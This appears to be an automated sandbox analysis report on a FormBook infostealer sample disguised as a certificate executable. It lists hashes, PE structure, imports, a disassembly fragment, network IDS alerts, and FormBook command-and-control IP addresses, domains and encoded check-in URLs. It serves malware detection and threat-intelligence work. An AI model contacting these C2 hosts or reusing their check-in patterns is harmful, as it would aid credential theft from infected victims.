• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Certificate 11-19AIS.exe
Time | Type | Description
07:57:50 | API Interceptor | 10891187x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.195.240.94 | Certificate 11-21AIS.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 1045-20-11.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 719A1120-2024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 64411-18.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-17.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rDocument11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | glued.hta | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rBALT-10212024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rAGROTIS10599242024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
154.215.72.110 | wOoESPII08.exe | malicious | FormBook | www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
154.215.72.110 | N2sgk6jMa2.exe | malicious | FormBook | www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
154.215.72.110 | Document 151-512024.exe | malicious | FormBook | www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.3xfootball.com | Certificate 11-21AIS.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | RvJVMsNLJI.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 64411-18.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-17.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-142024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | rDocument11-142024.exe | malicious | FormBook | 154.215.72.110
www.goldenjade-travel.com | Certificate 11-21AIS.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 1045-20-11.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 719A1120-2024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-18720.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | RvJVMsNLJI.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 64411-18.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-17.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-142024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | rDocument11-142024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | glued.hta | malicious | FormBook | 116.50.37.244
Match | Associated Sample Name / URL | Detection | Threat Name | Context
POWERLINE-AS-APPOWERLINEDATACENTERHK | ORIGINAL INVOICE COAU7230734290.exe | malicious | FormBook | 154.216.76.80
POWERLINE-AS-APPOWERLINEDATACENTERHK | Payroll List.exe | malicious | FormBook | 154.216.76.80
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-21AIS.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | DOC_114542366.vbe | malicious | FormBook | 156.251.17.224
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | https://trackru.top/us | malicious | Unknown | 156.244.41.195
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | RvJVMsNLJI.exe | malicious | FormBook | 154.215.72.110
REGISTER-ASIT | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 195.110.124.133
REGISTER-ASIT | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | Certificate 11-21AIS.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 1045-20-11.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 719A1120-2024.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 11-18720.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | RvJVMsNLJI.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 64411-18.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 11-142024.exe | malicious | FormBook | 195.110.124.133
SEDO-ASDE | Certificate 11-21AIS.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 1045-20-11.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 719A1120-2024.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 11-18720.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | RvJVMsNLJI.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 64411-18.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 11-17.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 11-142024.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | rDocument11-142024.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | 8dPlV2lT8o.exe | malicious | Simda Stealer | 91.195.240.19
                                                                            No context
                                                                            No context
Process: C:\Windows\SysWOW64\netbtugc.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209935793793442
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
MD5: 214CFA91B0A6939C4606C4F99C9183B3
SHA1: A36951EB26E00F95BFD44C0851827A032EAFD91A
SHA-256: 660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
SHA-512: E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\Certificate 11-19AIS.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.994449459526123
Encrypted: true
SSDEEP: 6144:e74hGiaxsOPBHYpegTU5HYOgRfQJPVxZKSLJl+hGR:u4wiayOPCmH9xZTGgR
MD5: 662CBC86DD42E258769623B2D2E5FD9D
SHA1: CB44D95D9BDFB4C0863B7B2924EC56C8B6E2C351
SHA-256: FD33FD801FEEB2E8D345C7CD706FA404FD40129A431A715B66C9A33FDCEC3A1B
SHA-512: A73D39409FFEBCB335A5F026202482255DE943D320C476A205D01439C4FFDA9B316DE5197D4001C3E8CCE89BD8FC5BC4328E3ACCE65A810263C9B2C703E0C4A4
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.134943968607026
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Certificate 11-19AIS.exe
File size: 1'203'200 bytes
MD5: 1e1db5d9c073fcff1706c32d887e3e28
SHA1: 76cd9d1e4b8817fccba215ecdf8916a8e9bcbe8b
SHA256: 4de8d7a95ca5edd2a521f7232b56b02d2f684f1638a2a704270631c127ba9c02
SHA512: 3bcde550451b05e5f0f6040ffead01af2b25625738a4dfaa30817fb6d7c6e933e68624e2954ce9db795c4bca5cd635186bd727ff8b39b38ee9e3da27a3270677
SSDEEP: 24576:otb20pkaCqT5TBWgNQ7a5yp3ZKcX+7a2PUMdHxzHdUH6A:xVg5tQ7a5ypJKc+7zddHxBq5
TLSH: 8B45CF1273DE8361C7B25273BA167701BEBF782506A1F96B2FD4093DF820162525EB63
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673C7594 [Tue Nov 19 11:25:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007F1C614D4F3Fh
jmp 00007F1C614C7F54h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1C614C80DAh
cmp edi, eax
jc 00007F1C614C843Eh
bt dword ptr [004C0158h], 01h
jnc 00007F1C614C80D9h
rep movsb
jmp 00007F1C614C83ECh
cmp ecx, 00000080h
jc 00007F1C614C82A4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1C614C80E0h
bt dword ptr [004BA370h], 01h
jc 00007F1C614C85B0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F1C614C827Dh
test edi, 00000003h
jne 00007F1C614C828Eh
test esi, 00000003h
jne 00007F1C614C826Dh
bt edi, 02h
jnc 00007F1C614C80DFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1C614C80E3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1C614C8135h
bt esi, 03h
jnc 00007F1C614C8188h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5cb70 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x121000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5cb70 | 0x5cc00 | c228c4ca7101f1a13bde382d7a69e3d9 | False | 0.9294769204851752 | data | 7.897484286094564 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x121000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x53e77 | data |  |  | 1.000322983318348
RT_GROUP_ICON | 0x120630 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1206a8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1206bc | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1206d0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1206e4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1207c0 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                                                                            DLLImport
                                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
                                                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, 
IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not retained)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T13:57:30.494965+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49764 | 154.215.72.110 | 80 | TCP
2024-11-25T13:58:04.614278+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49844 | 116.50.37.244 | 80 | TCP
2024-11-25T13:59:28.291434+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49899 | 85.159.66.93 | 80 | TCP
2024-11-25T13:59:43.521796+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49987 | 91.195.240.94 | 80 | TCP
2024-11-25T14:00:07.086273+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49991 | 66.29.149.46 | 80 | TCP
2024-11-25T14:00:22.539513+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49995 | 195.110.124.133 | 80 | TCP
2024-11-25T14:00:54.382040+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49999 | 217.196.55.202 | 80 | TCP
TCP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 25, 2024 14:00:13.170790911 CET4999280192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:13.292329073 CET8049992195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:14.523360014 CET8049992195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:14.523385048 CET8049992195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:14.523458004 CET4999280192.168.2.11195.110.124.133
